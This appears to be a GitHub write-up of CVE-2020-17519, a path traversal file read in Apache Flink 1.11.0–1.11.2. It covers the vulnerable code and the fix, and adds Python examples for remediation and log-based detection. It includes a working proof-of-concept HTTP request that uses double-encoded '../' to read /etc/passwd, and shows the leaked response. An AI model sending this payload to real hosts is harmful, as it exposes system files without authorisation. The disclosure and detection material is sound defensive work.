[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read

murataydemir/CVE-2020-17519
Apache Flink is a framework and distributed processing engine for stateful computations over unbounded and bounded data streams, developed in Java and Scala. A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the RESTful API of the JobManager process. Access is limited to files readable by the JobManager process.

All versions from 1.11.0 to 1.11.2 are affected by this vulnerability; Apache Flink fixed it in version 1.11.3 and above.

The vulnerable code is in the src/main/java/org/apache/flink/runtime/rest/handler/cluster/JobManagerCustomLogHandler.java class. The related code snippet is shown below.

	// Excerpt of JobManagerCustomLogHandler (Flink 1.11.0 - 1.11.2); logDir is the JobManager's log directory.
		if (logDir == null) {
			return null;
		}
		// The client-controlled path parameter is joined onto logDir as-is, so "../" sequences escape the directory.
		String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
		return new File(logDir, filename);
	}
}

The problem is that the request handler uses the client-supplied path parameter directly as a file path. The fixing commit changed the vulnerable line as shown below; in the snippet, the original vulnerable line is kept as a comment.

	// Excerpt of JobManagerCustomLogHandler after the fix (Flink 1.11.3 and above).
		if (logDir == null) {
			return null;
		}
		// String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
		// File#getName() keeps only the last path component, so any directory part (including "..") is discarded.
		String filename = new File(handlerRequest.getPathParameter(LogFileNamePathParameter.class)).getName();
		return new File(logDir, filename);
	}
}
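The following Python sketch is an added example, not code from this repository or from Apache Flink. It models what the fix above does (reducing the parameter to its last path component, as java.io.File#getName() does) next to the pre-fix behaviour, and adds a canonical-path containment check as defence in depth that the upstream patch does not include. LOG_DIR is a constructed stand-in for the JobManager's log directory, and the assumption that the parameter is percent-decoded twice before reaching the handler is made for this example only.

```python
import os
from urllib.parse import unquote

# Constructed value standing in for the JobManager's configured log directory.
LOG_DIR = "/opt/flink/log"


def decode_path_parameter(raw: str) -> str:
    """Decode the path parameter the way a front end that decodes twice would.

    The PoC sends '..%252f', which is '..%2f' after one decode and '../' after
    a second. Two decoding passes is an assumption made for this example, not
    something the repository states about the Flink router.
    """
    return unquote(unquote(raw))


def resolve_vulnerable(log_dir: str, filename: str) -> str:
    """Pre-fix behaviour: new File(logDir, filename) with filename untouched."""
    return os.path.normpath(os.path.join(log_dir, filename))


def resolve_fixed(log_dir: str, filename: str) -> str:
    """Post-fix behaviour: new File(filename).getName() keeps only the last
    path component, so every '../' segment is discarded before the join."""
    return os.path.join(log_dir, os.path.basename(filename))


def is_within(base_dir: str, candidate: str) -> bool:
    """Defence in depth that is not part of the upstream patch: compare
    absolute, normalised paths and require the candidate to sit under base_dir."""
    base = os.path.abspath(base_dir)
    cand = os.path.abspath(candidate)
    return cand == base or cand.startswith(base + os.sep)


def safe_log_path(log_dir: str, raw_param: str):
    """Apply the fixed resolution plus the containment check.

    Returns the path that may be served, or None when the request must be refused.
    """
    name = os.path.basename(decode_path_parameter(raw_param))
    if name in ("", ".", ".."):
        return None
    path = resolve_fixed(log_dir, name)
    return path if is_within(log_dir, path) else None


if __name__ == "__main__":
    # A traversal string in the shape of the PoC request (constructed input).
    poc = "..%252f" * 12 + "etc%252fpasswd"
    decoded = decode_path_parameter(poc)
    print("vulnerable:", resolve_vulnerable(LOG_DIR, decoded))  # /etc/passwd
    print("fixed:     ", resolve_fixed(LOG_DIR, decoded))       # /opt/flink/log/passwd
    print("served:    ", safe_log_path(LOG_DIR, poc))           # /opt/flink/log/passwd
```

With the pre-fix resolution the twelve "../" segments walk out of the log directory and normalise to /etc/passwd; with the fixed resolution the same input becomes /opt/flink/log/passwd, a file that does not exist, so the handler answers 404 instead of leaking the file. A stricter handler could reject any parameter that still contains a path separator after decoding rather than silently trimming it, which also makes such attempts stand out in logs.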

Proof of Concept (PoC): the following request can be used to exploit this vulnerability.

GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
Host: vulnerablehost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

The response to the above request is shown below.

HTTP/1.1 200 OK
Content-Type: text/plain
content-length: 964

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flink:x:9999:9999::/opt/flink:/bin/sh

A Metasploit module for CVE-2020-17519 is also available, with an Excellent ranking; its Ruby code can be found there.
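For teams that still run an affected JobManager, the request above leaves a recognisable trace: a /jobmanager/logs/ request whose file-name parameter, once fully percent-decoded, contains a path separator or a ".." segment. The following detection routine is an added example, not part of this repository; the access-log lines are constructed sample data in a combined log format, as a reverse proxy in front of the REST port might record them.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format); sample data, not logs from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:10:01:02 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120
10.0.0.9 - - [10/Jan/2021:10:01:07 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 964
10.0.0.9 - - [10/Jan/2021:10:01:09 +0000] "GET /jobmanager/logs/%2e%2e%2f%2e%2e%2fetc%2fhostname HTTP/1.1" 404 0
10.0.0.7 - - [10/Jan/2021:10:02:00 +0000] "GET /jobs/overview HTTP/1.1" 200 230
10.0.0.5 - - [10/Jan/2021:10:02:30 +0000] "GET /jobmanager/logs/flink-jobmanager.out HTTP/1.1" 200 88
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)
LOG_ENDPOINT = "/jobmanager/logs/"


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so that '%252f', '%2f'
    and '/' all compare equal regardless of how many encoding layers were used."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return value


def is_traversal(path: str) -> bool:
    """True when a /jobmanager/logs/ request names anything but a bare file name."""
    if not path.startswith(LOG_ENDPOINT):
        return False
    param = fully_decode(path[len(LOG_ENDPOINT):].split("?", 1)[0])
    segments = re.split(r"[\\/]", param)
    return len(segments) > 1 or param == ".."


def find_traversal_attempts(log_text: str):
    """Parse each line and return the requests that look like CVE-2020-17519 attempts.

    The HTTP status is kept because a 200 with a non-zero size means the file
    was actually served, while a 404 points at a patched host or a missing file.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": m["path"],
                "decoded": fully_decode(m["path"]),
                "status": int(m["status"]),
                "size": int(m["size"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["decoded"])
```

Run against the sample, the routine flags the two requests from 10.0.0.9 and ignores the legitimate log downloads. The decoded path and the status together tell a responder what to do next: a 200 with a plausible body size for a file outside the log directory means the host was still vulnerable when the request arrived, and the remediation is the upgrade to 1.11.3 or later plus restricting who can reach the REST port at all.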
